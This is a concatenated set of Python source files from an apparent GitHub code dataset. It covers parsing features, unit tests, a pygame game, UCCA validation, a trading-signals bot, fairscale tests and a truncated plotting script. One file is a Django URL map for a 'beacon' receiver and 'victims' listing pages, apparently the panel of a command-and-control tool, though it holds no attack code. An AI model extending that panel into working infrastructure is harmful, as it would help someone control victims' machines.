sentence: Sentence) -> Token:\n if DEPE in feature:\n relevant_token = dependent\n elif HEAD in feature:\n relevant_token = head\n else: # BETW\n betw_id = (head.id_ + dependent.id_) / 2\n if abs(head.id_ - betw_id) == 1:\n relevant_token = sentence.get_token_or_none_token(int(betw_id))\n else:\n relevant_token = Token.create_none()\n if NEXT in feature:\n relevant_token = sentence.get_token_or_none_token(relevant_token.id_ + 1)\n if PREV in feature:\n relevant_token = sentence.get_token_or_none_token(relevant_token.id_ - 1)\n return relevant_token\n\n @staticmethod\n def create_feature_dict(tree_bank: TreeBank, path: str) -> dict[str, int]:\n if os.path.isfile(path):\n print(f\"Found dict at given path, loading from file...\")\n return TemplateWizard.load_dict(path)\n print(f\"Creating new feature dict from tree bank, this might take a while...\")\n feature_dict = {}\n index = 0\n for sentence in tqdm(tree_bank):\n tree = sentence.to_tree()\n for token in sentence:\n for dependent in tree.get_dependent_ids(token.id_):\n feature_keys = TemplateWizard.get_feature_keys(token, dependent, sentence)\n for feature_key in feature_keys:\n if feature_key not in feature_dict:\n feature_dict[feature_key] = index\n index += 1\n TemplateWizard.save_dict(feature_dict, path)\n return feature_dict\n\n @staticmethod\n def save_dict(feature_dict: dict, path: str):\n with open(path, 'w', encoding=\"utf-8\") as f_out:\n for key, value in feature_dict.items():\n f_out.write(f\"{key}\\t{value}\\n\")\n\n @staticmethod\n def load_dict(path: str) -> dict[str, int]:\n feature_dict = {}\n with open(path, 'r', encoding=\"utf-8\") as f_in:\n for line in f_in.readlines():\n key, value = line.strip().split(\"\\t\")\n feature_dict[key] = int(value)\n return feature_dict\n","repo_name":"JensKaiser96/StatisticalDependencyParsing","sub_path":"src/features/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41878712856","text":"from unittest import TestCase\n\nfrom leetcodepy.minimum_window_substring import *\n\nSOLUTION1 = Solution1()\n\nS1 = \"ADOBECODEBANC\"\nT1 = \"ABC\"\nEXPECTED1 = \"BANC\"\n\nS2 = \"a\"\nT2 = \"a\"\nEXPECTED2 = \"a\"\n\nS3 = \"a\"\nT3 = \"aa\"\nEXPECTED3 = \"\"\n\n\nclass TestMinimumWindowSubstring(TestCase):\n def test1(self):\n self.assertEqual(EXPECTED1, SOLUTION1.minWindow(S1, T1))\n self.assertEqual(EXPECTED2, SOLUTION1.minWindow(S2, T2))\n self.assertEqual(EXPECTED3, SOLUTION1.minWindow(S3, T3))\n","repo_name":"qianbinbin/leetcode","sub_path":"python3/tests/test_minimum_window_substring.py","file_name":"test_minimum_window_substring.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"20280579114","text":"def linear_search(l, target):\n \"\"\"\n Returns the index position of the target if found, else returns None\n \"\"\"\n for i in range(0, len(l)):\n if l[i]==target:\n return i\n return None\n\ndef verify(index):\n if index is not None:\n print(f\"Target found at index: {index}\")\n else:\n print(\"Target not found in list.\")\n\n# Execution\nif __name__ == \"__main__\":\n # Input values\n target = 8\n list_length = 10\n\n # Algo\n numbers = [x for x in range(1, list_length+1)]\n result = linear_search(numbers, target)\n verify(result)","repo_name":"LucasLaLima/algorithms-data-structures","sub_path":"linear_search.py","file_name":"linear_search.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34892737129","text":"import pygame\nimport random\n\npygame.init()\nfrom setup import *\nfrom character import *\nfrom environment import *\nfrom obstacle import *\n\n\ndef main():\n global game_speed, points, obstacles\n run = True\n clock = pygame.time.Clock()\n player = Character()\n game_speed = 18\n points = 0\n obstacles = []\n death_count = 0\n\n def score():\n global points, game_speed\n points += 1\n if points % 100 == 0:\n game_speed += 1\n\n text = font.render(\"Points: \" + str(points), True, (0, 0, 0))\n textRect = text.get_rect()\n textRect.center = (1200, 40)\n SCREEN.blit(text, textRect)\n\n backgrounds = AllBackgrounds(game_speed)\n\n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n SCREEN.fill((255, 255, 255))\n userInput = pygame.key.get_pressed()\n\n backgrounds.draw()\n backgrounds.update()\n\n player.draw(SCREEN)\n player.update(userInput)\n\n if len(obstacles) == 0:\n if random.randint(0, 2) == 0:\n obstacles.append(SmallCactus(CACTUS_1))\n elif random.randint(0, 2) == 1:\n obstacles.append(LargeCactus(CACTUS_2))\n elif random.randint(0, 2) == 2:\n obstacles.append(Bird(BIRD))\n\n for obstacle in obstacles:\n obstacle.draw(SCREEN)\n obstacle.update(game_speed, obstacles)\n if player.character_rect.colliderect(obstacle.rect):\n pygame.time.delay(1000)\n death_count += 1\n menu(death_count)\n # pygame.draw.rect(SCREEN, (255, 0, 0), player.character_rect, 2)\n\n score()\n\n clock.tick(30)\n pygame.display.update()\n\n\ndef menu(death_count):\n global points\n run = True\n while run:\n SCREEN.fill((255, 255, 255))\n font = pygame.font.Font('freesansbold.ttf', 30)\n\n if death_count == 0:\n text = font.render(\"Press any Key to Start\", True, (0, 0, 0))\n elif death_count > 0:\n text = font.render(\"Press any Key to Restart\", True, (0, 0, 0))\n score = font.render(\"Your Score: \" + str(points), True, (0, 0, 0))\n scoreRect = score.get_rect()\n scoreRect.center = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2 + 50)\n SCREEN.blit(score, scoreRect)\n textRect = text.get_rect()\n textRect.center = (SCREEN_WIDTH // 2, SCREEN_HEIGHT // 2)\n SCREEN.blit(text, textRect)\n SCREEN.blit(RUNNING[0], (SCREEN_WIDTH // 2 - 90, SCREEN_HEIGHT // 2 - 180))\n pygame.display.update()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n if event.type == pygame.KEYDOWN:\n main()\n\n\nmenu(death_count=0)\n","repo_name":"dimasnoufal/2dRunGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34563873869","text":"from django.urls import path,re_path,include\nfrom django.http import HttpResponseRedirect\n\nfrom . import views\n\napp_name = 'candela'\nurlpatterns = [\n re_path(r'^$', lambda r: HttpResponseRedirect('victims/')),\n path('beacon/', views.receive_beacon, name='receive_beacon'),\n path('victims/', include([\n path('', views.victims_index, name='victims_index'),\n path('list/', views.list_victims, name='list_victims'),\n path('<int:id>/', include([\n path('', views.victim_details, name='victim_details'),\n path('sent/', views.list_sent, name='victim_sent'),\n path('stack/', views.list_stack, name='victim_stack'),\n ])),\n ])),\n]\n","repo_name":"norrell/candela","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39300307506","text":"import string\n\nfrom ucca import layer0, layer1\nfrom ucca.layer0 import NodeTags as L0Tags\nfrom ucca.layer1 import EdgeTags as ETags, NodeTags as L1Tags\n\nLINKAGE = (ETags.LinkArgument, ETags.LinkRelation)\n\n\ndef validate(passage, linkage=True):\n for node in passage.layer(layer0.LAYER_ID).all:\n yield from NodeValidator(node).validate_terminal()\n heads = list(passage.layer(layer1.LAYER_ID).heads)\n found_linkage = False\n for node in heads:\n if node.tag == L1Tags.Linkage:\n found_linkage = True\n yield from NodeValidator(node).validate_top_level()\n stack = [heads]\n visited = set()\n path = []\n path_set = set(path)\n while stack:\n for node in stack[-1]:\n if node in path_set:\n yield \"Detected cycle (%s)\" % \"->\".join(n.ID for n in path)\n elif node not in visited:\n visited.add(node)\n path.append(node)\n path_set.add(node)\n stack.append(node.children)\n yield from NodeValidator(node).validate_non_terminal(linkage=linkage and found_linkage)\n break\n else:\n if path:\n path_set.remove(path.pop())\n stack.pop()\n\n\nclass NodeValidator:\n def __init__(self, node):\n self.node = node\n self.incoming = tag_to_edge(node.incoming)\n self.outgoing = tag_to_edge(node)\n self.incoming_tags = set(self.incoming)\n self.outgoing_tags = set(self.outgoing)\n\n def validate_terminal(self):\n if not self.node.text:\n yield \"Empty terminal text (%s)\" % self.node.ID\n if set(self.node.text).intersection(string.whitespace):\n yield \"Whitespace in terminal text (%s): '%s'\" % (self.node.ID, self.node)\n if not self.incoming:\n yield \"Orphan %s terminal (%s) '%s'\" % (self.node.tag, self.node.ID, self.node)\n elif len(self.node.incoming) > 1:\n yield \"Reentrant %s terminal (%s) '%s'\" % (self.node.tag, join(self.node.incoming), self.node)\n\n def validate_top_level(self):\n if self.node.ID != \"1.1\" and self.node.tag != L1Tags.Linkage:\n yield \"Extra root (%s)\" % self.node.ID\n terminals = [n for n in self.node.children if n.layer.ID == layer0.LAYER_ID]\n if terminals:\n yield \"Terminal children (%s) of root (%s)\" % (join(terminals), self.node)\n s = self.outgoing_tags.difference((ETags.ParallelScene, ETags.Linker, ETags.Function, ETags.Ground,\n ETags.Punctuation, ETags.LinkRelation, ETags.LinkArgument))\n if s:\n yield \"Top-level node (%s) with %s edge\" % (self.node.ID, join(s))\n\n def validate_non_terminal(self, linkage=False):\n if linkage and self.node.tag == L1Tags.Linkage:\n yield from self.validate_linkage()\n elif self.node.tag == L1Tags.Foundational:\n yield from self.validate_foundational()\n primary_incoming = [e for e in self.node.incoming if not e.attrib.get(\"remote\") and e.tag not in LINKAGE]\n if len(primary_incoming) > 1:\n yield \"Multiple incoming non-remote (%s)\" % join(primary_incoming)\n remote_incoming = [e for e in self.node.incoming if e.attrib.get(\"remote\")]\n if remote_incoming and not primary_incoming:\n yield \"Node (%s) with remote parents but no primary parents\" % self.node.ID\n for edge in self.node:\n if (edge.tag == ETags.Punctuation) != (edge.child.tag == L1Tags.Punctuation):\n yield \"%s edge (%s) with %s child\" % (edge.tag, edge, edge.child.tag)\n # FN parent of Punctuation is disallowed unless the FN is unanalyzable\n if (self.node.tag == L1Tags.Foundational) and (edge.child.tag == L0Tags.Punct) and \\\n not len(self.node.terminals) + len(self.node.punctuation) == len(self.node.children) > 1 or \\\n (self.node.tag == L1Tags.Punctuation) and not (edge.child.tag == L0Tags.Punct):\n yield \"%s node (%s) with %s child (%s)\" % (self.node.tag, self.node.ID, edge.child.tag, edge.child.ID)\n if self.node.attrib.get(\"implicit\"):\n if self.node.outgoing:\n yield \"Implicit node (%s) with outgoing edges (%s)\" % (self.node.ID, join(self.node))\n elif self.node.tag in (L1Tags.Foundational, L1Tags.Linkage, L1Tags.Punctuation) and \\\n all(e.attrib.get(\"remote\") for e in self.node):\n yield \"Non-implicit node (%s) with no primary children\" % (self.node.ID)\n for tag in (ETags.Function, ETags.ParallelScene, ETags.Linker, ETags.LinkRelation,\n ETags.Connector, ETags.Punctuation, ETags.Terminal):\n s = self.incoming.get(tag, ())\n if len(s) > 1:\n yield \"Multiple incoming %s edges (%s)\" % (tag, join(s))\n for tag in (ETags.LinkRelation, ETags.Process, ETags.State):\n s = self.outgoing.get(tag, ())\n if len(s) > 1:\n yield \"Multiple outgoing %s edges (%s)\" % (tag, join(s))\n if ETags.Function in self.incoming:\n s = self.outgoing_tags.difference((ETags.Terminal, ETags.Punctuation))\n if s:\n yield \"%s node (%s) with outgoing %s edge: %s\" % (ETags.Function, self.node.ID, join(s), self.node)\n if ETags.Linker in self.incoming_tags and linkage and ETags.LinkRelation not in self.incoming_tags:\n yield \"%s node (%s) with no incoming %s\" % (ETags.Linker, self.node.ID, ETags.LinkRelation)\n\n def validate_linkage(self):\n if self.node.incoming:\n yield \"Non-root %s node (%s)\" % (self.node.tag, self.node)\n s = self.outgoing_tags.difference(LINKAGE)\n if s:\n yield \"%s node (%s) with %s children\" % (self.node.tag, self.node, join(s))\n if ETags.LinkRelation not in self.outgoing:\n yield \"%s node without %s child\" % (self.node.tag, ETags.LinkRelation)\n\n def validate_foundational(self):\n if self.node.participants and not self.node.is_scene():\n yield \"Node (%s) with participants but without main relation: %s\" % (self.node.ID, self.node)\n if self.node.process and self.node.state:\n yield \"Node (%s) with both process (%s) and state (%s)\" % (self.node.ID, self.node.process, self.node.state)\n if self.node.parallel_scenes:\n s = self.outgoing_tags.difference((ETags.ParallelScene, ETags.Punctuation, ETags.Linker,\n ETags.Ground, ETags.Relator, ETags.Function))\n if s:\n yield \"Node (%s) with parallel scenes has %s edge\" % (self.node.ID, join(s))\n s = self.outgoing_tags.intersection(LINKAGE)\n if s:\n yield \"Non-linkage node (%s) with %s edges\" % (self.node, join(s))\n\n\ndef tag_to_edge(edges):\n d = {}\n for edge in edges:\n d.setdefault(edge.tag, []).append(edge)\n return d\n\n\ndef join(items):\n return \", \".join(map(str, items))\n","repo_name":"shachardon/ucca","sub_path":"ucca/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":7029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"11092243900","text":"from create_bot import bot\r\nfrom config import logger\r\nimport asyncio\r\nimport time\r\n\r\nfrom handlers.user import manager as user_manager\r\nfrom . import manager\r\n\r\nfrom typing import List, Tuple, Dict\r\nfrom entities.parsing.types import (\r\n\tParserResponse, Advertisement\r\n)\r\nfrom entities import (\r\n\tUser, Parametres, Signal\r\n)\r\n\r\n\r\n# Dict with the tuple of signals sent to a user\r\nsignals: Dict[int, Tuple[Signal]] = {}\r\n\r\n\r\n@logger.catch\r\nasync def server(wait_for: int):\r\n\t\"\"\"\r\n\tServer function that runs periodically to process signals for active users\r\n\r\n\tArgs:\r\n\t\twait_for (int): The time interval to wait between server pings\r\n\t\"\"\"\r\n\r\n\t# List of user IDs that have been notified about inefficient parameters\r\n\tnotified_users: List[int] = list()\r\n\tmin_acceptable_signals_amount = 5\r\n\r\n\tawait manager.set_fiats_symbols()\r\n\r\n\twhile True:\r\n\t\tawait asyncio.sleep(wait_for)\r\n\t\tlogger.success(\"Server ping\")\r\n\r\n\t\ttry:\r\n\t\t\tactive_users: List[User] = await user_manager.get_active_users()\r\n\t\t\tlogger.info(f\"Active users amount: {len(active_users)}\")\r\n\r\n\t\t\t# Check if notified users turned off the bot\r\n\t\t\tfor user_id in notified_users:\r\n\t\t\t\tif not user_id in [user.user_id for user in active_users]:\r\n\t\t\t\t\tnotified_users.remove(user_id)\r\n\r\n\t\t\tfor user in active_users:\r\n\t\t\t\tuser_id = user.user_id\r\n\r\n\t\t\t\tparametres: Parametres = await user_manager.get_user_parametres(user_id)\r\n\r\n\t\t\t\tif not parametres:\r\n\t\t\t\t\tlogger.error(f\"No parametres: {user_id}\")\r\n\t\t\t\t\tcontinue\r\n\r\n\t\t\t\ttotal_sent_signals = tuple()\r\n\t\t\t\tif signals.get(user_id):\r\n\t\t\t\t\tformer_signals = signals[user_id]\r\n\t\t\t\telse:\r\n\t\t\t\t\tformer_signals = tuple()\r\n\r\n\t\t\t\tfor currency in parametres.currencies.value:\r\n\t\t\t\t\tparsers_responses = await manager.gather_parsers_responses(\r\n\t\t\t\t\t\tcurrency, parametres\r\n\t\t\t\t\t)\r\n\r\n\t\t\t\t\tsent_signals: Tuple[Signal] = await manager.iterate_advertisments(\r\n\t\t\t\t\t\tuser_id, parametres, parsers_responses, former_signals\r\n\t\t\t\t\t)\r\n\t\t\t\t\ttotal_sent_signals += sent_signals\r\n\r\n\t\t\t\t# Notification about inefficient parametres\r\n\t\t\t\tif len(total_sent_signals) < min_acceptable_signals_amount and \\\r\n\t\t\t\t\t\t\t\t\tnot user_id in notified_users:\r\n\t\t\t\t\tawait manager.notificate_user(user_id)\r\n\t\t\t\t\tnotified_users.append(user_id)\r\n\r\n\t\t\t\tif total_sent_signals:\r\n\t\t\t\t\tsignals[user_id] = total_sent_signals\r\n\r\n\t\t\t\tlogger.info(f\"{user_id} | {user.username} Sent signals: {len(total_sent_signals)}\")\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tlogger.error(f\"Signals thread crashed: {e}\")\r\n\t\t\tcontinue\r\n","repo_name":"NikitaKostin1/SpreadCatcher","sub_path":"signals/thread.py","file_name":"thread.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69889731752","text":"# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>\nfrom matplotlib.backend_bases import KeyEvent\nimport numpy as np\nimport pytest\nimport wx\n\nfrom eelbrain import datasets, plot, testnd\nfrom eelbrain._utils import IS_WINDOWS\nfrom eelbrain.testing import requires_mne_sample_data, hide_plots\nfrom eelbrain.testing.matplotlib import assert_titles_visible\n\n\n@hide_plots\ndef test_plot_topomap():\n \"Test plot.Topomap\"\n ds = datasets.simulate_erp(8, 0)\n ds['long'] = ds['n_chars'] > 4\n ds['topo'] = ds['eeg'].mean(time=(0.300, 0.500))\n\n p = plot.Topomap('topo', data=ds)\n # contours\n p.add_contour(0, '0', 'V')\n p.add_contour(0.5e-6, '#00FF00', 'V')\n # colormap with limits\n assert p.get_vlim() == (-2e-06, 2e-06)\n cmap = plot.soft_threshold_colormap('jet', 1e-6, 4e-6, symmetric=True)\n p.set_cmap(cmap)\n assert p.get_vlim() == (-4e-06, 4e-06)\n p.close()\n\n p = plot.Topomap('topo', data=ds, vmax=0.5e-6, w=2)\n p.close()\n p = plot.Topomap('topo', 'predictability', data=ds, axw=2)\n assert_titles_visible(p)\n p.close()\n p = plot.Topomap('topo', 'predictability % long', data=ds, axw=2, ncol=2)\n assert_titles_visible(p)\n p.close()\n p = plot.Topomap('topo', 'predictability % long', data=ds, axw=2, ncol=2, title='Topomap Plot Title')\n assert_titles_visible(p)\n p.close()\n\n # axtitles from array\n index = np.array([1, 3, 2])\n p = plot.Topomap(ds[index, 'topo'], '.case', nrow=1, axh=2, h=2.4, axtitle=index)\n p.close()\n\n\n@requires_mne_sample_data\n@hide_plots\ndef test_plot_topomap_mne():\n \"Test plot.Topomap with MNE data\"\n ds = datasets.get_mne_sample(sub=[0, 1], sns=True)\n p = plot.Topomap(ds['meg'].summary(time=(.1, .12)), proj='left')\n p.close()\n # grad\n ds = datasets.get_mne_sample(sub=[0], sns='planar1')\n plot.Topomap('meg.sub(time=.1)', data=ds)\n\n\n@hide_plots\ndef test_plot_topo_butterfly():\n \"Test plot.TopoButterfly\"\n ds = datasets.get_uts(utsnd=True)\n\n # single row\n p = plot.TopoButterfly('utsnd', data=ds)\n p.set_time(0.2)\n # t keypress on topomap\n x, y = p.topo_axes[0].transAxes.transform((.5, .5))\n event = KeyEvent('test', p.canvas, 't', x, y, wx.KeyEvent())\n p._on_key_press(event)\n p.close()\n\n p = plot.TopoButterfly('utsnd', data=ds, vmax=2, w=6, t=0.5)\n assert p.axes[0].get_ylim() == (-2.0, 2.0)\n assert p._time_fixed\n p.close()\n\n # multiple rows\n p = plot.TopoButterfly('utsnd', 'A%B', data=ds, w=6)\n if not IS_WINDOWS:\n assert (*p.figure.get_size_inches(),) == (6, 12)\n # t keypress on topomaps\n for ax in p.topo_axes:\n x, y = ax.transAxes.transform((.5, .5))\n event = KeyEvent('test', p.canvas, 't', x, y, wx.KeyEvent())\n p._on_key_press(event)\n p.close()\n\n p = plot.TopoButterfly('utsnd', mark=[1, 2], data=ds)\n p.close()\n\n p = plot.TopoButterfly('utsnd', mark=['1', '2'], data=ds)\n p.set_vlim(2)\n assert p.get_vlim() == (-2.0, 2.0)\n p.set_ylim(-1, 1)\n assert p.get_ylim() == (-1.0, 1.0)\n p.close()\n\n\n@hide_plots\ndef test_plot_array():\n \"Test plot.TopoArray\"\n ds = datasets.get_uts(utsnd=True)\n p = plot.TopoArray('utsnd', data=ds)\n assert repr(p) == \"<TopoArray: utsnd>\"\n p.set_topo_t(0, 0.2)\n p.close()\n p = plot.TopoArray('utsnd', data=ds, vmax=0.2, w=2)\n p.close()\n p = plot.TopoArray('utsnd', 'A%B', data=ds, axw=4)\n assert repr(p) == \"<TopoArray: utsnd ~ A x B>\"\n p.close()\n\n # results\n res = testnd.TTestIndependent('utsnd', 'A', data=ds, pmin=0.05, tstart=0.1, tstop=0.3, samples=2)\n p = plot.TopoArray(res)\n assert repr(p) == \"<TopoArray: a0, a1, a0 - a1>\"\n p.set_topo_t(0, 0.)\n p.close()\n","repo_name":"christianbrodbeck/Eelbrain","sub_path":"eelbrain/plot/tests/test_topo.py","file_name":"test_topo.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"72"} +{"seq_id":"28013696788","text":"from math import factorial\n\nresult = 0\n\nfor i in range(3, 1000000):\n j = str(i)\n r = 0\n for e in j:\n e = int(e)\n r += factorial(e)\n if i == r:\n print(i)\n result += i\n\nprint(result)","repo_name":"ManusRH/ProjectEuler-Python","sub_path":"34.py","file_name":"34.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17827089211","text":"import time\n\nimport pytest\nimport torch\n\nfrom fairscale.experimental.wgit.signal_sparsity_profiling import EnergyConcentrationProfile as ECP\nfrom fairscale.fair_dev.testing.testing import objects_are_equal, skip_if_no_cuda\n\n# Our own tolerance\nATOL = 1e-6\nRTOL = 1e-5\n\n# enable this for debugging.\n# torch.set_printoptions(precision=20)\n\n\n@skip_if_no_cuda\ndef test_nonblocking():\n \"\"\"Tests cpu runs ahead of the GPU in the measuring process.\"\"\"\n big = torch.rand(10, 1000, 1000).cuda()\n ecp = ECP(dim=2, top_k_percents=[1, 5, 10, 50, 90])\n start = time.time()\n out = ecp.measure(big)\n out_fft = ecp.measure_fft(big)\n cpu_time = time.time() - start\n torch.cuda.synchronize()\n gpu_time = time.time() - start\n assert cpu_time * 5 < gpu_time, f\"GPU time should dominate {cpu_time} vs. {gpu_time}\"\n for o in [out, out_fft]:\n # validate the output\n p = [x.item() for x in o]\n for n, n1 in zip(p, p[1:]):\n assert n <= n1 and n >= 0 and n <= 100, f\"n={n} n1={n1}\"\n\n\ndef get_ones():\n \"\"\"Return test data with ones tensor\"\"\"\n return (\n 0,\n [1, 5, 10, 100],\n torch.ones(100),\n [torch.tensor(0.01), torch.tensor(0.05), torch.tensor(0.1), torch.tensor(1.0)],\n )\n\n\ndef get_dim_0():\n \"\"\"Test case for dim=0 for 2D input.\"\"\"\n return (\n 0,\n [1, 3, 33, 66, 90],\n torch.tensor([0.1, 0.2, 0.1, 0.45]).repeat(100, 1),\n [torch.tensor(0.01), torch.tensor(0.03), torch.tensor(0.33), torch.tensor(0.66), torch.tensor(0.9)],\n )\n\n\n@pytest.mark.parametrize(\n \"dim, percents, in_tensor, out_tensors\",\n [\n get_ones(),\n get_dim_0(),\n ],\n)\ndef test_expected_output(dim, percents, in_tensor, out_tensors):\n \"\"\"Test with a few expected input & outputs.\"\"\"\n ecp = ECP(dim, percents)\n out = ecp.measure(in_tensor)\n objects_are_equal(out, out_tensors, raise_exception=True, rtol=RTOL, atol=ATOL)\n out_fft = ecp.measure_fft(torch.fft.ifft(in_tensor, dim=dim))\n objects_are_equal(out_fft, out_tensors, raise_exception=True, rtol=RTOL, atol=ATOL)\n","repo_name":"facebookresearch/fairscale","sub_path":"tests/experimental/wgit/test_signal_sparsity_profiling.py","file_name":"test_signal_sparsity_profiling.py","file_ext":"py","file_size_in_byte":2087,"program_lang":"python","lang":"en","doc_type":"code","stars":2639,"dataset":"github-code","pt":"72"} +{"seq_id":"33013303888","text":"# Utility Function which finds the family assistance amount using some conditions\r\ndef familyAssistance():\r\n # keep track on totalFamilyAssistance\r\n # of all families\r\n totalAmountOfAssistance=0\r\n # run until user want\r\n while True:\r\n # input: income\r\n income=int(input(\"Enter housold income: \"))\r\n # if -1 end program\r\n if income==-1:\r\n print(\"Exit..!!!\")\r\n # print totalAsstitance value till the families\r\n print(f'Tha total amount of Assistance: {totalAmountOfAssistance}')\r\n return\r\n # children input\r\n children=int(input(\"Enter number of children: \"))\r\n # condition 1: if income is greater than 30000 and less than or equal to 40000\r\n if income>30000 and income<=40000:\r\n # if children greater than or equal to 3\r\n if children>=3 :\r\n # totalAssistance for this family children is\r\n assistanceAmount=children*1000\r\n # add this to our global totalAssistance\r\n totalAmountOfAssistance=totalAmountOfAssistance+assistanceAmount\r\n # Print amount of assistance\r\n print(f'Amount of Assistance: {assistanceAmount}')\r\n # Condition 2: if income is greater than 20000 and less than or equal to 30000\r\n elif income>20000 and income<=30000:\r\n # if family have greater than or equal to 2 children\r\n if children>=2:\r\n # totalAssistance for this family children is\r\n assistanceAmount=children*1500\r\n # add this to our global totalAssistance\r\n totalAmountOfAssistance=totalAmountOfAssistance+assistanceAmount\r\n # Print amount of assistance\r\n print(f'Amount of Assistance: {assistanceAmount}')\r\n # else if income is less than or equal to 20000\r\n elif income<=20000:\r\n # totalAssistance for this family children is\r\n assistanceAmount=children*2000\r\n # add this to our global totalAssistance\r\n totalAmountOfAssistance=totalAmountOfAssistance+assistanceAmount\r\n # Print amount of assistance\r\n print(f'Amount of Assistance: {assistanceAmount}')\r\n # else if income is greater than 40000\r\n elif income>40000:\r\n # assitance amount =0\r\n assistanceAmount=0\r\n totalAmountOfAssistance=totalAmountOfAssistance+0\r\n print(f'Amount of Assistance: {assistanceAmount}')\r\n \r\n\r\nif __name__ == '__main__':\r\n familyAssistance()\r\n ","repo_name":"Nilesh1206/mission_faang","sub_path":"Chegg/77_Family.py","file_name":"77_Family.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33161388479","text":"from flask_app import app\nfrom flask_app.config.mysqlconnection import connectToMySQL\nfrom flask import flash\nDB = \"tienda_virtual\"\n\nclass Producto:\n def __init__(self,producto):\n self.id = producto[\"id\"]\n self.codigo = producto[\"codigo\"]\n self.producto = producto[\"producto\"]\n self.descripcion = producto[\"descripcion\"]\n self.precio = producto[\"precio\"]\n self.imagen = producto[\"imagen\"]\n \n @classmethod\n def get_all(cls):\n query = \"SELECT * from producto;\"\n producto_data = connectToMySQL(DB).query_db(query)\n productos = []\n for producto in producto_data:\n productos.append(cls(producto))\n return productos\n \n @classmethod\n def get_by_producto(cls,producto):\n \n data = {\"producto\":\"%%\"+producto+\"%%\"}\n query = \"SELECT * FROM producto where producto like %(producto)s;\"\n\n result = connectToMySQL(DB).query_db(query,data)\n\n productos = []\n for producto in result:\n productos.append(cls(producto))\n return productos\n\n @classmethod\n def get_by_id(cls, producto_id):\n\n data = {\"id\": producto_id}\n query = \"SELECT * FROM producto WHERE id = %(id)s;\"\n result = connectToMySQL(DB).query_db(query,data)\n productos = []\n for producto in result:\n productos.append(cls(producto))\n return productos","repo_name":"JulioAR0800/PROYECTO_INDIVIDUAL","sub_path":"PROYECTO INDIVIDUAL/flask_app/models/producto.py","file_name":"producto.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25478740320","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport re\nimport sys\n\ndef extract_probabilities(log_lines, skip_x_probs):\n probabilities = []\n epoch_indeces = []\n current_problem = \"\"\n prob_regex = r'was chosen with probability ([0-9]+\\.[0-9]*)'\n epoch_regex = r'Epoch (\\d+):'\n prob_counter = -1\n prob_index = 0\n for line in log_lines:\n match = re.search(prob_regex, line)\n if match:\n prob_counter += 1\n if prob_counter % skip_x_probs != 0:\n continue\n prob = float(match.group(1))\n probabilities.append((prob_index * skip_x_probs, prob))\n prob_index += 1\n continue\n\n match = re.match(epoch_regex, line)\n if match:\n epoch_indeces.append(prob_index)\n prob_index += 1\n return probabilities, epoch_indeces\n\n\ndef write_probability_graph(probabilities, epoch_indeces, tex_path):\n with open(tex_path, 'w') as f:\n f.write('\\\\begin{tikzpicture}[trim axis left]\\n')\n f.write('\\t\\\\begin{axis}[\\n')\n f.write('\\t\\tscale only axis,\\n')\n f.write('\\t\\theight=5cm,\\n')\n f.write('\\t\\twidth=\\\\textwidth,\\n')\n f.write('\\t\\tmax space between ticks=50,\\n')\n f.write('\\t\\tminor x tick num=4,\\n')\n f.write('\\t\\tminor y tick num=4,\\n')\n f.write('\\t\\ttick style={semithick,color=black},\\n')\n f.write('\\t\\txlabel=action $a$,\\n')\n f.write('\\t\\txticklabels={,,},\\n')\n f.write('\\t\\tylabel=$\\pi^\\\\theta(a \\\\mid s)$]\\n')\n f.write('\\t\\\\addplot[smooth,mark=*] plot coordinates {\\n')\n for prob_index, prob in probabilities:\n f.write('\\t\\t(%d,%f)\\n' % (prob_index, prob))\n f.write('\\t};\\n')\n for epoch_index in epoch_indeces:\n f.write('\\t\\\\draw[dashed] ({axis cs:%d,0}|-{rel axis cs:0,1}) -- ({axis cs:%d,0}|-{rel axis cs:0,0});\\n' % (epoch_index, epoch_index))\n f.write('\\t\\\\end{axis}\\n')\n f.write('\\\\end{tikzpicture}')\n\n\ndef main(argv):\n if len(argv) < 2 or len(argv) > 4:\n print(\"Usage: python3 loss_graph.py <path/to/training_sum.log> (<path/to/save_dir>) (<skip_every_x_probs>)\")\n sys.exit(1)\n training_log_path = argv[1]\n if len(argv) == 3:\n save_dir = argv[2]\n else:\n save_dir = './'\n if len(argv) == 4:\n skip_x_probs = int(argv[3])\n else:\n # default skip 10 probabilities before taking one\n skip_x_probs = 10\n if 'elevator' in training_log_path:\n skip_x_probs = 1\n\n log_file = open(training_log_path, 'r')\n log_lines = [l.strip() for l in log_file.readlines()]\n\n # first line ends with <domain>: -> split to get \"<domain:\" and drop last character\n domain_name = log_lines[0].split()[-1][:-1]\n tex_path = os.path.join(save_dir, 'action_probability_graph_' + domain_name + '.tex')\n probabilities, 